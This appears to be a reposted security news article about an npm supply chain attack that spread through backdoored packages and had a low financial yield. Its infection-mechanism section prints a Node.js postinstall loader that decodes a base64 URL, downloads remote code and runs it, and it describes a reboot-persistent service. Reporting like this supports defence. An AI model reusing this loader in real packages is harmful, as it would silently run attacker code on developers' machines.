A sophisticated npm supply chain attack that surfaced in late August targeted thousands of downstream projects by injecting malicious payloads into popular JavaScript libraries.
Initial reports pointed to a new variant of the notorious Typosquatting technique, but further analysis revealed a more elaborate campaign that leveraged compromised maintainer credentials to publish backdoored modules under legitimate package names.
The attack spread rapidly across the ecosystem, touching applications in enterprise SaaS platforms, developer tooling, and even educational projects.
Wiz.io researchers noted unusual network activity originating from continuous integration (CI) pipelines shortly after innocuous library updates.
While initial telemetry suggested data exfiltration, closer inspection showed the payloads executed only conditional routines, avoiding outright destructive behavior.
Instead, the malicious code sampled environment variables, logged system metadata, and prepared to download secondary payloads from attacker-controlled domains.
By design, the attackers minimized detectable anomalies, blending in with routine package updates and careful versioning strategies to maintain persistence.
Impact assessments estimated that over 4,500 projects fetched at least one compromised release before maintainers rolled back affected versions.
Despite this broad reach, analysis of blockchain-based payment channels and cryptocurrency wallets tied to the campaign showed that only a handful of transactions—totaling less than $200 in value—were ultimately completed.
.webp "Hackers Booked Very Little Profit with Widespread npm Supply Chain Attack 3")
The low financial yield suggests that the operators were more interested in reconnaissance and establishing footholds rather than immediate monetization, underscoring the evolving motives behind modern supply chain threats.
Wiz.io analysts later identified additional indicators of compromise (IoCs) embedded in popular CI logs, including obfuscated URLs and base64-encoded data blocks that served as the initial staging point for more complex malware families.
This discovery prompted rapid patching of pipeline scripts and heightened scrutiny of npm registry credentials across major development teams.
Infection Mechanism and Persistence
The malicious packages employed a multi-stage infection mechanism that began with a benign-looking postinstall script.
Upon installation, the script executes a small loader written in Node.js:-
// figure1_loader.js
const https = require('https');
const { exec } = require('child_process');
const payloadUrl = Buffer.from('aHR0cHM6Ly9lbWFpbC5hZGRyZXNzLmNvbS9sb2FkZXIuanM=', 'base64').toString();
https.get(payloadUrl, (res) => {
let data="";
res.on('data', (chunk) => data += chunk);
res.on('end', () => {
exec(data, (error, stdout, stderr) => {
if (error) console.error(stderr);
else console.log(stdout);
});
});
});This demonstrates how the attacker concealed the real download URL using Base64 encoding to evade simple string-matching defenses.
After retrieving the secondary payload, the loader writes a Node.js service file into the user’s home directory, ensuring automatic execution upon system reboot.
This service introduces a persistence layer that survives package removals and registry clean-ups, effectively granting the attacker long-term access to compromised development environments.
By chaining together innocuous-appearing scripts and encrypted staging, the campaign avoided common detection mechanisms and underscored the growing sophistication of supply chain threats.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Source link
